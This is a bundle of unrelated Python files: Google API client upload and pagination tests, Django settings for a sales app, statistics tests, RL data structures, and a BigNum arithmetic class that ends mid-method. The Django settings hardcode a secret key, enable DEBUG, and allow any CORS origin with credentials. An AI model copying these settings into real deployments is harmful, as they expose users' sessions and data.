request = zoo.animals().insert(media_body=media_upload, body=None)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '400'}, ''),
])
self.assertRaises(HttpError, request.execute, http=http)
self.assertTrue(request._in_error_state)
http = HttpMockSequence([
({'status': '308',
'range': '0-5'}, ''),
({'status': '308',
'range': '0-6'}, ''),
])
status, body = request.next_chunk(http=http)
self.assertEquals(status.resumable_progress, 7,
'Should have first checked length and then tried to PUT more.')
self.assertFalse(request._in_error_state)
# Put it back in an error state.
http = HttpMockSequence([
({'status': '400'}, ''),
])
self.assertRaises(HttpError, request.execute, http=http)
self.assertTrue(request._in_error_state)
# Pretend the last request that 400'd actually succeeded.
http = HttpMockSequence([
({'status': '200'}, '{"foo": "bar"}'),
])
status, body = request.next_chunk(http=http)
self.assertEqual(body, {'foo': 'bar'})
def test_media_io_base_stream_unlimited_chunksize_resume(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
# Set up a seekable stream and try to upload in single chunk.
fd = BytesIO(b'01234"56789"')
media_upload = MediaIoBaseUpload(
fd=fd, mimetype='text/plain', chunksize=-1, resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
# The single chunk fails, restart at the right point.
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2',
'range': '0-4'}, ''),
({'status': '200'}, 'echo_request_body'),
])
body = request.execute(http=http)
self.assertEqual('56789', body)
def test_media_io_base_stream_chunksize_resume(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
# Set up a seekable stream and try to upload in chunks.
fd = BytesIO(b'0123456789')
media_upload = MediaIoBaseUpload(
fd=fd, mimetype='text/plain', chunksize=5, resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
# The single chunk fails, pull the content sent out of the exception.
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '400'}, 'echo_request_body'),
])
try:
body = request.execute(http=http)
except HttpError as e:
self.assertEqual(b'01234', e.content)
def test_resumable_media_handle_uploads_of_unknown_size(self):
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '200'}, 'echo_request_headers_as_json'),
])
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
# Create an upload that doesn't know the full size of the media.
class IoBaseUnknownLength(MediaUpload):
def chunksize(self):
return 10
def mimetype(self):
return 'image/png'
def size(self):
return None
def resumable(self):
return True
def getbytes(self, begin, length):
return '0123456789'
upload = IoBaseUnknownLength()
request = zoo.animals().insert(media_body=upload, body=None)
status, body = request.next_chunk(http=http)
self.assertEqual(body, {
'Content-Range': 'bytes 0-9/*',
'Content-Length': '10',
})
def test_resumable_media_no_streaming_on_unsupported_platforms(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
class IoBaseHasStream(MediaUpload):
def chunksize(self):
return 10
def mimetype(self):
return 'image/png'
def size(self):
return None
def resumable(self):
return True
def getbytes(self, begin, length):
return '0123456789'
def has_stream(self):
return True
def stream(self):
raise NotImplementedError()
upload = IoBaseHasStream()
orig_version = sys.version_info
sys.version_info = (2, 6, 5, 'final', 0)
request = zoo.animals().insert(media_body=upload, body=None)
# This should raise an exception because stream() will be called.
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '200'}, 'echo_request_headers_as_json'),
])
self.assertRaises(NotImplementedError, request.next_chunk, http=http)
sys.version_info = orig_version
def test_resumable_media_handle_uploads_of_unknown_size_eof(self):
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '200'}, 'echo_request_headers_as_json'),
])
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
fd = BytesIO(b'data goes here')
# Create an upload that doesn't know the full size of the media.
upload = MediaIoBaseUpload(
fd=fd, mimetype='image/png', chunksize=15, resumable=True)
request = zoo.animals().insert(media_body=upload, body=None)
status, body = request.next_chunk(http=http)
self.assertEqual(body, {
'Content-Range': 'bytes 0-13/14',
'Content-Length': '14',
})
def test_resumable_media_handle_resume_of_upload_of_unknown_size(self):
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '400'}, ''),
])
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
# Create an upload that doesn't know the full size of the media.
fd = BytesIO(b'data goes here')
upload = MediaIoBaseUpload(
fd=fd, mimetype='image/png', chunksize=500, resumable=True)
request = zoo.animals().insert(media_body=upload, body=None)
# Put it in an error state.
self.assertRaises(HttpError, request.next_chunk, http=http)
http = HttpMockSequence([
({'status': '400',
'range': '0-5'}, 'echo_request_headers_as_json'),
])
try:
# Should resume the upload by first querying the status of the upload.
request.next_chunk(http=http)
except HttpError as e:
expected = {
'Content-Range': 'bytes */14',
'content-length': '0'
}
self.assertEqual(expected, json.loads(e.content.decode('utf-8')),
'Should send an empty body when requesting the current upload status.')
def test_pickle(self):
sorted_resource_keys = ['_baseUrl',
'_developerKey',
'_dynamic_attrs',
'_http',
'_model',
'_requestBuilder',
'_resourceDesc',
'_rootDesc',
'_schema',
'animals',
'global_',
'load',
'loadNoTemplate',
'my',
'new_batch_http_request',
'query',
'scopedAnimals']
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
self.assertEqual(sorted(zoo.__dict__.keys()), sorted_resource_keys)
pickled_zoo = pickle.dumps(zoo)
new_zoo = pickle.loads(pickled_zoo)
self.assertEqual(sorted(new_zoo.__dict__.keys()), sorted_resource_keys)
self.assertTrue(hasattr(new_zoo, 'animals'))
self.assertTrue(callable(new_zoo.animals))
self.assertTrue(hasattr(new_zoo, 'global_'))
self.assertTrue(callable(new_zoo.global_))
self.assertTrue(hasattr(new_zoo, 'load'))
self.assertTrue(callable(new_zoo.load))
self.assertTrue(hasattr(new_zoo, 'loadNoTemplate'))
self.assertTrue(callable(new_zoo.loadNoTemplate))
self.assertTrue(hasattr(new_zoo, 'my'))
self.assertTrue(callable(new_zoo.my))
self.assertTrue(hasattr(new_zoo, 'query'))
self.assertTrue(callable(new_zoo.query))
self.assertTrue(hasattr(new_zoo, 'scopedAnimals'))
self.assertTrue(callable(new_zoo.scopedAnimals))
self.assertEqual(sorted(zoo._dynamic_attrs), sorted(new_zoo._dynamic_attrs))
self.assertEqual(zoo._baseUrl, new_zoo._baseUrl)
self.assertEqual(zoo._developerKey, new_zoo._developerKey)
self.assertEqual(zoo._requestBuilder, new_zoo._requestBuilder)
self.assertEqual(zoo._resourceDesc, new_zoo._resourceDesc)
self.assertEqual(zoo._rootDesc, new_zoo._rootDesc)
# _http, _model and _schema won't be equal since we will get new
# instances upon un-pickling
def _dummy_zoo_request(self):
with open(os.path.join(DATA_DIR, 'zoo.json'), 'rU') as fh:
zoo_contents = fh.read()
zoo_uri = uritemplate.expand(DISCOVERY_URI,
{'api': 'zoo', 'apiVersion': 'v1'})
if 'REMOTE_ADDR' in os.environ:
zoo_uri = util._add_query_parameter(zoo_uri, 'userIp',
os.environ['REMOTE_ADDR'])
http = build_http()
original_request = http.request
def wrapped_request(uri, method='GET', *args, **kwargs):
if uri == zoo_uri:
return httplib2.Response({'status': '200'}), zoo_contents
return original_request(uri, method=method, *args, **kwargs)
http.request = wrapped_request
return http
def _dummy_token(self):
access_token = 'foo'
client_id = 'some_client_id'
client_secret = 'cOuDdkfjxxnv+'
refresh_token = '1/0/a.df219fjls0'
token_expiry = datetime.datetime.utcnow()
user_agent = 'refresh_checker/1.0'
return OAuth2Credentials(
access_token, client_id, client_secret,
refresh_token, token_expiry, GOOGLE_TOKEN_URI,
user_agent)
def test_pickle_with_credentials(self):
credentials = self._dummy_token()
http = self._dummy_zoo_request()
http = credentials.authorize(http)
self.assertTrue(hasattr(http.request, 'credentials'))
zoo = build('zoo', 'v1', http=http)
pickled_zoo = pickle.dumps(zoo)
new_zoo = pickle.loads(pickled_zoo)
self.assertEqual(sorted(zoo.__dict__.keys()),
sorted(new_zoo.__dict__.keys()))
new_http = new_zoo._http
self.assertFalse(hasattr(new_http.request, 'credentials'))
def test_resumable_media_upload_no_content(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('empty'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
self.assertEquals(media_upload, request.resumable)
self.assertEquals(request.body, None)
self.assertEquals(request.resumable_uri, None)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2',
'range': '0-0'}, ''),
])
status, body = request.next_chunk(http=http)
self.assertEquals(None, body)
self.assertTrue(isinstance(status, MediaUploadProgress))
self.assertEquals(0, status.progress())
class Next(unittest.TestCase):
def test_next_successful_none_on_no_next_page_token(self):
self.http = HttpMock(datafile('tasks.json'), {'status': '200'})
tasks = build('tasks', 'v1', http=self.http)
request = tasks.tasklists().list()
self.assertEqual(None, tasks.tasklists().list_next(request, {}))
def test_next_successful_none_on_empty_page_token(self):
self.http = HttpMock(datafile('tasks.json'), {'status': '200'})
tasks = build('tasks', 'v1', http=self.http)
request = tasks.tasklists().list()
next_request = tasks.tasklists().list_next(
request, {'nextPageToken': ''})
self.assertEqual(None, next_request)
def test_next_successful_with_next_page_token(self):
self.http = HttpMock(datafile('tasks.json'), {'status': '200'})
tasks = build('tasks', 'v1', http=self.http)
request = tasks.tasklists().list()
next_request = tasks.tasklists().list_next(
request, {'nextPageToken': '123abc'})
parsed = list(urlparse(next_request.uri))
q = parse_qs(parsed[4])
self.assertEqual(q['pageToken'][0], '123abc')
def test_next_successful_with_next_page_token_alternate_name(self):
self.http = HttpMock(datafile('bigquery.json'), {'status': '200'})
bigquery = build('bigquery', 'v2', http=self.http)
request = bigquery.tabledata().list(datasetId='', projectId='', tableId='')
next_request = bigquery.tabledata().list_next(
request, {'pageToken': '123abc'})
parsed = list(urlparse(next_request.uri))
q = parse_qs(parsed[4])
self.assertEqual(q['pageToken'][0], '123abc')
def test_next_successful_with_next_page_token_in_body(self):
self.http = HttpMock(datafile('logging.json'), {'status': '200'})
logging = build('logging', 'v2', http=self.http)
request = logging.entries().list(body={})
next_request = logging.entries().list_next(
request, {'nextPageToken': '123abc'})
body = JsonModel().deserialize(next_request.body)
self.assertEqual(body['pageToken'], '123abc')
def test_next_with_method_with_no_properties(self):
self.http = HttpMock(datafile('latitude.json'), {'status': '200'})
service = build('latitude', 'v1', http=self.http)
service.currentLocation().get()
def test_next_nonexistent_with_no_next_page_token(self):
self.http = HttpMock(datafile('drive.json'), {'status': '200'})
drive = build('drive', 'v3', http=self.http)
drive.changes().watch(body={})
self.assertFalse(callable(getattr(drive.changes(), 'watch_next', None)))
def test_next_successful_with_next_page_token_required(self):
self.http = HttpMock(datafile('drive.json'), {'status': '200'})
drive = build('drive', 'v3', http=self.http)
request = drive.changes().list(pageToken='startPageToken')
next_request = drive.changes().list_next(
request, {'nextPageToken': '123abc'})
parsed = list(urlparse(next_request.uri))
q = parse_qs(parsed[4])
self.assertEqual(q['pageToken'][0], '123abc')
class MediaGet(unittest.TestCase):
def test_get_media(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.animals().get_media(name='Lion')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['alt'], ['media'])
self.assertEqual(request.headers['accept'], '*/*')
http = HttpMockSequence([
({'status': '200'}, 'standing in for media'),
])
response = request.execute(http=http)
self.assertEqual(b'standing in for media', response)
if __name__ == '__main__':
unittest.main()
|
py | b410525235df656c536f9eaa88b2001a1aaa2cfe | """
Django settings for vendas project.
Generated by 'django-admin startproject' using Django 3.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-l)d%4bo%=ad8vtk9g%_ns^$@dq@q+l%rd(@3%!g&@&vtyxfebr'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
'vendas-mercos.herokuapp.com',
'127.0.0.1',
'localhost'
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'rest_framework',
'pedidos.apps.PedidosConfig',
'clientes.apps.ClientesConfig',
'produtos.apps.ProdutosConfig',
'item_pedido.apps.ItemPedidoConfig',
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.BrokenLinkEmailsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ORIGIN_ALLOW_ALL = True # If this is used then `CORS_ORIGIN_WHITELIST` will not have any effect
CORS_ALLOW_CREDENTIALS = True
CORS_ORIGIN_REGEX_WHITELIST = [
'http://localhost:8000',
]
ROOT_URLCONF = 'vendas.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'vendas.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
in_heroku = False
if 'DATABASE_URL' in os.environ:
in_heroku = True
import dj_database_url
if in_heroku:
DATABASES = {'default': dj_database_url.config()}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
REST_FRAMEWORK = {
'COERCE_DECIMAL_TO_STRING': False,
} |
py | b41052d25339393a0e3dc10fa35844dbf48040cf | """ Verification tests for the categorical difference tests.
Author:
C.M. Gosmeyer
Date:
Mar 2018
References:
"Introduction to Statistical Problem Solving in Geography",
J.C. McGrew, Jr., A.J. Lembo, Jr., C.B. Monroe
"""
import numpy as np
import pytest
from stats.inferential_stats.categorical import *
from stats.inferential_stats.pvalue import PValue
class TestChiSquare(object):
""" Uses table 12.1
"""
def setup(self):
FC_o = [42, 45, 51, 47, 60]
FC_e = [49, 49, 49, 49, 49]
return ChiSquare(FC_o, FC_e)
def test_chi_square(self):
ChiSqaretest = self.setup()
val = round(ChiSqaretest.test_stat, 2)
assert val == 3.96
def test_pvalue(self):
ChiSqaretest = self.setup()
chi_square = round(ChiSqaretest.test_stat, 2)
p = PValue(test_stat=chi_square, n=5, chi_square=True)
pvalue = round(p.pvalue, 2)
assert pvalue == 0.41
class TestKolmogorovSmirnov(object):
NotImplemented
class TestContingency(object):
""" Uses table 12.6
"""
def setup(self):
FC_o = [[60, 70], [36, 33]]
return Contingency(FC_o)
def test_FC_e(self):
Contingencytest = self.setup()
val = round(Contingencytest.FC_e[0][0], 1)
assert val == 62.7
def test_chi_square(self):
Contingencytest = self.setup()
val = round(Contingencytest.test_stat, 2)
assert val == 0.65
|
py | b41053099f25cc6e1db23b75e6685cb6c3fd2f44 | # coding=utf-8
# Copyright 2019 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common collections for all problems."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Tuple containing state of the environment.
# reward: a scalar float specifying the immediate reward for the step.
# done: a boolean indicating if this is the end of the current episode.
# observation: a numpy array or nested dict/list/tuple of numpy arrays
# containing information about current internal state.
# info: a numpy array or nested dict/list/tuple of numpy arrays containing
# any debug information.
EnvOutput = collections.namedtuple("EnvOutput",
["reward", "done", "observation", "info"])
# Tuple containing output of the agent.
# policy_logits: The logits of all possible actions.
# baseline: The value of given state.
AgentOutput = collections.namedtuple("AgentOutput",
["policy_logits", "baseline"])
# Tuple containing runtime configuration for distributed setup.
# task_id: A unique id assigned to each task
# num_tasks: Total tasks performing the same functionality.
RuntimeConfig = collections.namedtuple("RuntimeConfig",
["task_id", "num_tasks"])
# Tuple containing information about action taken by actor.
# chosen_action_idx: An int32 specifying the index of the chosen action at the
# current timestep.
# oracle_next_action_idx: An int32 specifying the index of the action at the
# next timestep that oracle would have chosen.
# action_val: An int32 specifying the pano id of the chosen action.
# log_prob: Float specifying the policy log-probability of the chosen action.
ActorAction = collections.namedtuple(
"ActorAction", ["chosen_action_idx", "oracle_next_action_idx", "action_val",
"log_prob"])
# Tuple containing output of the actor which is then read by learner.
# initial_agent_state: a tensor containing previous episode's final agent
# state. This may be used to initialize learner agent's initial state at
# the beginning of a batch. This tensor doesn't have time or batch dimension.
# env_output: A `EnvOutput` tuple for all the steps in the episode. The nested
# tensors have first dimension equal to number of timesteps.
# agent_output: A `AgentOutput` tuple for all steps in the episode. The nested
# tensors have first dimension equal to number of timesteps.
# action_action: A `ActorAction` tuple for all steps in the episode. The nested
# tensors have first dimension equal to number of timesteps.
# loss_type: A scalar int tensor denoting the type of loss to be used by
# learner on the enqueued episode.
# info: Any debug information to be passed on to the learner.
ActorOutput = collections.namedtuple("ActorOutput", [
"initial_agent_state", "env_output", "agent_output", "actor_action",
"loss_type", "info"
])
# Tuple contaiming information for aggregator summaries.
StepSummaries = collections.namedtuple("StepSummaries",
("step", "count", "metrics_sum"))
# Tuple containing agent and environment state, for use in planning.
# score: a scalar float for comparing the value of planning states.
# agent_output: A `AgentOutput` tuple.
# agent_state: A tensor containing the agent state. This tensor doesn't have
# time or batch dimension.
# env_output: A `EnvOutput` tuple.
# env_state: An object containing the environment state from get_state.
# action_history: A list with an `ActorAction` for each step in the episode.
PlanningState = collections.namedtuple("PlanningState", [
"score", "agent_output", "agent_state", "env_output", "env_state",
"action_history"])
# Different loss types supported in the framework.
# actor-critic loss
AC_LOSS = 0
# cross-entropy loss
CE_LOSS = 1
# Discriminative model Cross-Entropy loss
DCE_LOSS = 2
# Discriminative model focal loss
DCE_FOCAL_LOSS = 3
# Discriminator Batch Softmax loss
DISC_BATCH_LOSS = 4
STEP = "__reserved__step"
# Special field for visualization images.
VISUALIZATION_IMAGES = "visualization_images"
AUC = "auc"
|
py | b41055b63ace987879bcb741bab0340796e52167 | '''Large number arithmetic optimized for KS cores.'''
from __future__ import division # Use // for integer division.
import os # Used for os.environ.
import sys # Used to smooth over the range / xrange issue.
# Python 3 doesn't have xrange, and range behaves like xrange.
if sys.version_info >= (3,):
xrange = range
if os.environ.get('KS_DEBUG') and os.environ.get('KS_DEBUG') != 'false':
from ks_primitives import *
else:
from ks_primitives_unchecked import *
class BigNum(object):
'''Large number implemented as a little-endian array of Bytes.'''
def __init__(self, digits, size = None, no_copy = False):
'''Creates a BigNum from a sequence of digits.
Args:
digits: the Bytes used to populate the BigNum
size: if set, the BigNum will only use the first "size" elements of digits
no_copy: uses the "digits" argument as the backing store for BigNum, if
appropriate (meant for internal use inside BigNum)
'''
if size is None:
size = len(digits)
elif size < 0:
raise ValueError('BigNums cannot hold a negative amount of digits')
if size == 0:
size = 1
if no_copy and len(digits) == size:
self.d = digits
else:
self.d = digits[0:size]
while len(self.d) < size:
self.d.append(Byte.zero())
# Used by the Newton-Raphson division code.
self.__inverse = None
self.__inverse_precision = None
@staticmethod
def zero(size = 1):
'''BigNum representing the number 0 (zero).'''
return BigNum([Byte.zero()] * size, size, True)
@staticmethod
def one(size = 1):
'''BigNum representing the number 1 (one).'''
digits = [Byte.zero()] * size
digits[0] = Byte.one()
return BigNum(digits, size, True)
@staticmethod
def from_hex(hex_string):
'''BigNum representing the given hexadecimal number.
Args:
hex_string: string containing the desired number in hexadecimal; the
allowed digits are 0-9, A-F, a-f
'''
digits = []
for i in xrange(len(hex_string), 0, -2):
if i == 1:
byte_string = '0' + hex_string[0]
else:
byte_string = hex_string[(i - 2):i]
digits.append(Byte.from_hex(byte_string))
return BigNum(digits)
@staticmethod
def h(hex_string):
'''Shorthand for from_hex(hex_string).'''
return BigNum.from_hex(hex_string)
def hex(self):
'''Hexadecimal string representing this BigNum.
This method does not normalize the BigNum, because it is used during
debugging.
'''
start = len(self.d) - 1
while start > 0 and self.d[start] == Byte.zero():
start -= 1
return ''.join([self.d[i].hex() for i in xrange(start, -1, -1)])
def __eq__(self, other):
'''== for BigNums.
Comparing BigNums normalizes them.'''
if not isinstance(other, BigNum):
return False
self.normalize()
other.normalize()
return self.d == other.d
def __ne__(self, other):
'''!= for BigNums.
Comparing BigNums normalizes them.'''
if not isinstance(other, BigNum):
return True
self.normalize()
other.normalize()
return self.d != other.d
def __lt__(self, other):
'''< for BigNums.
Comparing BigNums normalizes them.'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be compared to other BigNums.
self.normalize()
other.normalize()
if len(self.d) != len(other.d):
return len(self.d) < len(other.d)
for i in xrange(len(self.d) - 1, -1, -1):
if self.d[i] != other.d[i]:
return self.d[i] < other.d[i]
return False
def __le__(self, other):
'''<= for BigNums.
Comparing BigNums normalizes them.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be compared to other BigNums.
self.normalize()
other.normalize()
if len(self.d) != len(other.d):
return len(self.d) < len(other.d)
for i in xrange(len(self.d) - 1, -1, -1):
if self.d[i] != other.d[i]:
return self.d[i] < other.d[i]
return True
def __gt__(self, other):
'''> for BigNums.
Comparing BigNums normalizes them.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be compared to other BigNums.
return not self.__le__(other)
def __ge__(self, other):
'''>= for BigNums.
Comparing BigNums normalizes them.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be compared to other BigNums.
return not self.__lt__(other)
def __lshift__(self, digits):
'''This BigNum, with "digits" 0 digits appended at the end.
Shifting to the left multiplies the BigNum by 256^digits.
'''
new_digits = [Byte.zero()] * digits
new_digits.extend(self.d)
return BigNum(new_digits, None, True)
def __rshift__(self, digits):
'''This BigNum, without the last "digits" digits.
Shifting to the left multiplies the BigNum by 256^digits.
'''
if digits >= len(self.d):
return BigNum.zero()
return BigNum(self.d[digits:], None, True)
def __add__(self, other):
'''+ for BigNums.
Shifting to the left has the effect of multiplying the BigNum by 256^digits.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be added to BigNums.
# One would think that it'd be faster to have a for loop for the digits
# between 0 and min(len(self.d), len(other.d)), and another loop between
# min(...) and max(...), so the ifs would be eliminated.
# Turns out pypy's JITter can eliminate the range checks on list accesses
# for the code below, so this method ends up being significantly faster than
# the one mentioned above, which intuitively seems better.
result = BigNum.zero(1 + max(len(self.d), len(other.d)))
carry = Byte.zero()
for i in xrange(0, len(result.d)):
if i < len(self.d):
a = self.d[i] + carry
else:
a = carry.word()
if i < len(other.d):
b = other.d[i].word()
else:
b = Word.zero()
word = a + b
result.d[i] = word.lsb()
carry = word.msb()
return result.normalize()
def __sub__(self, other):
'''- for BigNums.
Subtraction is done using 2s complement.
Subtracting numbers does not normalize them. However, the result is
normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be subtracted from BigNums.
result = BigNum.zero(max(len(self.d), len(other.d)))
carry = Byte.zero()
for i in xrange(0, len(result.d)):
if i < len(self.d):
a = self.d[i].word()
else:
a = Word.zero()
if i < len(other.d):
b = other.d[i] + carry
else:
b = carry.word()
word = a - b
result.d[i] = word.lsb()
if a < b:
carry = Byte.one()
else:
carry = Byte.zero()
return result.normalize()
def __mul__(self, other):
'''* for BigNums.
Multiplying numbers does not normalize them. However, the result is
normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be multiplied by BigNums.
if len(self.d) <= 64 or len(other.d) <= 64:
return self.slow_mul(other)
return self.fast_mul(other)
def slow_mul(self, other):
'''
Slow method for multiplying two numbers w/ good constant factors.
'''
return self.fast_mul(other)
def fast_mul(self, other):
'''
Asymptotically fast method for multiplying two numbers.
'''
in_digits = max(len(self.d), len(other.d))
if in_digits == 1:
product = self.d[0] * other.d[0]
return BigNum([product.lsb(), product.msb()], 2, True)
split = in_digits // 2
self_low = BigNum(self.d[:split], None, True)
self_high = BigNum(self.d[split:], None, True)
other_low = BigNum(other.d[:split], None, True)
other_high = BigNum(other.d[split:], None, True)
result_high_high = self_high * other_high
result_low = self_low * other_low
result_high = (self_low + self_high) * (other_low + other_high) - \
(result_high_high + result_low)
return ((result_high_high << (2 * split)) + (result_high << split) +
result_low).normalize()
def __floordiv__(self, other):
'''/ for BigNums.
Dividing numbers normalizes them. The result is also normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be divided by other BigNums.
return self.__divmod__(other)[0]
def __mod__(self, other):
'''% for BigNums.
Multiplying numbers does not normalize them. However, the result is
normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be divided by other BigNums.
return self.__divmod__(other)[1]
def __divmod__(self, other):
'''divmod() for BigNums.
Dividing numbers normalizes them. The result is also normalized.
'''
if not isinstance(other, BigNum):
return NotImplemented # BigNums can only be divided by other BigNums.
self.normalize()
other.normalize()
if len(self.d) <= 256 or len(other.d) <= 256:
return self.slow_divmod(other)
return self.fast_divmod(other)
def slow_divmod(self, other):
'''
Slow method for dividing two numbers w/ good constant factors.
'''
return self.fast_divmod(other)
def fast_divmod(self, other):
'''
Asymptotically fast method for dividing two numbers.
'''
# Special-case 1 so we don't have to deal with its inverse.
if len(other.d) == 1 and other.d[0] == Byte.one():
return (self, BigNum.zero())
if other.__inverse is None:
# First approximation: the inverse of the first digit in the divisor + 1,
# because 1 / 2xx is <= 1/200 and > 1/300.
base = Word.from_bytes(Byte.one(), Byte.zero())
msb_plus = (other.d[-1] + Byte.one()).lsb()
if msb_plus == Byte.zero():
msb_inverse = (base - Word.one()).lsb()
other.__inverse_precision = len(other.d) + 1
else:
msb_inverse = base // msb_plus
other.__inverse_precision = len(other.d)
other.__inverse = BigNum([msb_inverse], 1, True)
bn_one = BigNum.one()
while True:
# Division using other's multiplicative inverse.
quotient = (self * other.__inverse) >> other.__inverse_precision
product = other * quotient
if product > self:
product -= other
quotient -= bn_one
if product <= self:
remainder = self - product
if remainder >= other:
remainder -= other
quotient += bn_one
if remainder < other:
return (quotient, remainder)
# other needs a better multiplicative inverse approximation.
old_inverse = other.__inverse
old_precision = other.__inverse_precision
other.__inverse = ((old_inverse + old_inverse) << old_precision) - \
(other * old_inverse * old_inverse)
other.__inverse.normalize()
other.__inverse_precision *= 2
# Trim zero digits at the end, they don't help.
zero_digits = 0
while other.__inverse.d[zero_digits] == Byte.zero():
zero_digits += 1
if zero_digits > 0:
other.__inverse = other.__inverse >> zero_digits
other.__inverse_precision -= zero_digits
def powmod(self, exponent, modulus):
'''Modular ^.
Args:
exponent: the exponent that this number will be raised to
modulus: the modulus
Returns (self ^ exponent) mod modulus.
'''
multiplier = BigNum(self.d)
result = BigNum.one()
exp = BigNum(exponent.d)
exp.normalize()
two = (Byte.one() + Byte.one()).lsb()
for i in xrange(len(exp.d)):
mask = Byte.one()
for j in xrange(0, 8):
if (exp.d[i] & mask) != Byte.zero():
result = (result * multiplier) % modulus
mask = (mask * two).lsb()
multiplier = (multiplier * multiplier) % modulus
return result
def __str__(self):
'''Debugging help: returns the BigNum formatted as "0x????...".'''
return '0x' + self.hex()
def __repr__(self):
'''Debugging help: returns an expression that can create this BigNum.'''
